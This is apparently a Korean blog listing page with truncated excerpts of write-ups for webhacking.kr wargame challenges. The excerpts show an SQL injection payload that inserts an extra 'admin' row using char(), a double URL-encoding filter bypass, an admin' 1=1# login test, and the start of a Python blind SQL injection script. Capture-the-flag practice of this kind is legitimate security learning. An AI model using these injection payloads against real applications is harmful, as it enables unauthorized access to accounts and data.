목록공부/webhacking.kr (3)
hOwDayS 선린 10720
admin , ip , dummy 를 넣어야 된다insert into challenge35_list(id,ip,phone) values('$_SESSION[id]','$_SERVER[REMOTE_ADDR]',$_GET[phone),010),('admin','1.236.88.213',010 을 넣으면insert into challenge35_list(id,ip,phone) values('$_SESSION[id]','$_SERVER[REMOTE_ADDR]', 010),('admin','1.236.88.213',010)' 가 안되므로 char 로 이용해 아스키코드로 입력한다 http://webhacking.kr/challenge/web/web-17/index.php?phone=010),(char(97,100,..
urldecode 16진수 디코딩%61%64%6D%69%6E 을 입력하면 안된다.알아보니까 입력하고 엔터를 누르면한번 디코딩이 된다.그러므로 한번더 인코딩한다%2561%2564%256D%2569%256E
user key = md5값md5를 복호화하는 내가 join한 uuid + salt (zombie) 가 붙어있었음 sql 인젝션을 확인하기 위해 username에 admin' 1=1#을 넣으면 Wrong password! 페이지가 뜬다sql 인젝션의 가능을 확인했으니 blind injection으로 and 를 사용해 입력하면 된다 12345678910111213141516171819202122232425262728import httplibimport urllib2 , urllibimport re pw = "" #resultmd5_range = range(48,58)#numbermd5_range+=range(97,104)#letter result = ""url="http://webhacking.kr/cha..